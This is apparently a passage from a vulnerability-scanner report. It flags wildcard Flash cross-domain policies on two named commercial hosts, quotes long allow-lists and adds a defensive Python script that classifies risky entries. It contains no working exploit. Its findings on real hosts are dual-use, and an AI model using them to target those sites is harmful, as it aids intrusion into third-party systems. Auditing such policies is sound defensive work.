<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.63. http://login.dotomi.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that a SWF served from any host matching the wildcard expression can make requests to this application carrying the user's cookies and read the responses, which bypasses the same-origin policy for Flash content. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Here the policy grants *.dotomi.com on a login host, so every current and future subdomain of dotomi.com, including any that resolves to decommissioned or third-party infrastructure, is trusted with authenticated responses.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:04 GMT
Server: Apache
X-Name: dmc-o01
Set-Cookie: Apache=173.193.214.243.1305510844202398; path=/
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500060-a1-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://*.dotomi.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

6.64. http://media.restorationhardware.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.restorationhardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that a SWF served from any host matching the wildcard expression can make requests to this application carrying the user's cookies and read the responses. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy. The policy returned by this host (shown below) is a long shared list covering many unrelated organisations, and several kinds of entry in it deserve a closer look than the generic Low rating suggests: entries with secure="false", which let content loaded over plain HTTP from the named domains interact with this host over HTTPS; wildcards over shared hosting domains such as *.cloudfront.net and an EC2 hostname, where any customer of the provider can obtain a matching host; private and loopback addresses (10.80.1.x, 127.0.0.1), which only matter on a network where Flash content can be served from those addresses; and malformed entries (host:port values, *.*.fds.com, domain names padded with spaces) that match no real origin as written and show the list is not being validated before it is published.
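The two findings above (6.63 and 6.64) are Burp's generic wildcard warning; when reviewing a long policy like the one returned by this host, the useful output is a per-entry classification rather than a single severity. The script below is an added example written for this report, not code from the scanner or from any of the sites listed; it parses a crossdomain.xml body and tags each allow-access-from entry with the problems discussed above. The sample policy embedded in it is constructed from the entry shapes that appear in the quoted responses (not the full files), and the list of shared-hosting suffixes is an illustrative assumption to extend for the CDNs and PaaS providers you encounter.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Constructed sample: a condensed mix of the entry types seen in the responses
# quoted in this report. It is not either host's full policy.
SAMPLE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
<allow-access-from domain="*.*.fds.com" secure="false"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="www.agilent.com" secure="true" />
</cross-domain-policy>
"""

# Assumption: suffixes under which arbitrary third parties can obtain a hostname.
# Illustrative only; extend for the providers you see in real policies.
SHARED_HOSTING_SUFFIXES = (".cloudfront.net", ".amazonaws.com", ".edgesuite.net")

# A valid entry is a hostname, optionally prefixed by a single leading "*.".
HOSTNAME_RE = re.compile(r"^(\*\.)?([a-z0-9-]+\.)*[a-z0-9-]+$", re.IGNORECASE)


def classify_entry(domain, secure):
    """Return the list of finding tags for one allow-access-from entry.

    `secure` is the attribute value as a lower-case string. Flash Player only
    honours it when the policy itself is served over HTTPS (default "true").
    """
    tags = []
    if domain != domain.strip():
        tags.append("whitespace")  # padded value never matches a real origin
    d = domain.strip()
    if d == "*":
        return ["global-wildcard"]  # every origin on the Internet
    if secure == "false":
        tags.append("secure-false")  # plain-HTTP origins may read HTTPS responses
    if ":" in d:
        tags.append("port-in-domain")  # ports are not part of the domain syntax
    if d.count("*") > 1:
        tags.append("multi-wildcard")  # only a single leading "*." is valid
    try:
        ip = ipaddress.ip_address(d)
    except ValueError:
        ip = None
    if ip is not None:
        tags.append("ip-literal")
        if ip.is_private or ip.is_loopback:
            tags.append("internal-ip")
        return tags
    if not HOSTNAME_RE.match(d):
        tags.append("malformed")
    if d.endswith(SHARED_HOSTING_SUFFIXES):
        tags.append("shared-hosting")  # any tenant of the provider can match
    if d.startswith("*"):
        tags.append("wildcard")
    return tags


def audit_policy(xml_text):
    """Parse a crossdomain.xml body and return [(domain, [tags...]), ...]
    for every entry that raised at least one tag. Clean entries are omitted."""
    root = ET.fromstring(xml_text)
    seen = set()
    findings = []
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        secure = (el.get("secure") or "true").lower()
        tags = classify_entry(domain, secure)
        key = (domain.strip().lower(), secure)
        if key in seen:
            tags.append("duplicate")  # same grant listed twice: unmaintained list
        seen.add(key)
        if tags:
            findings.append((domain, tags))
    return findings


if __name__ == "__main__":
    for domain, tags in audit_policy(SAMPLE_POLICY):
        print("%-45r %s" % (domain, ", ".join(tags)))
```

To run it against a live host, fetch /crossdomain.xml with any HTTP client and pass the body to audit_policy; if the policy comes from an untrusted host, parse it with defusedxml instead of the standard ElementTree so a hostile document cannot abuse entity expansion. Note that the secure attribute is only meaningful when the policy is served over HTTPS, so a secure="false" tag on an HTTP-only host is a hygiene finding rather than an exposure.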

Request

GET /crossdomain.xml HTTP/1.0
Host: media.restorationhardware.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Expires: Mon, 16 May 2011 11:53:22 GMT
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Date: Mon, 16 May 2011 01:53:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
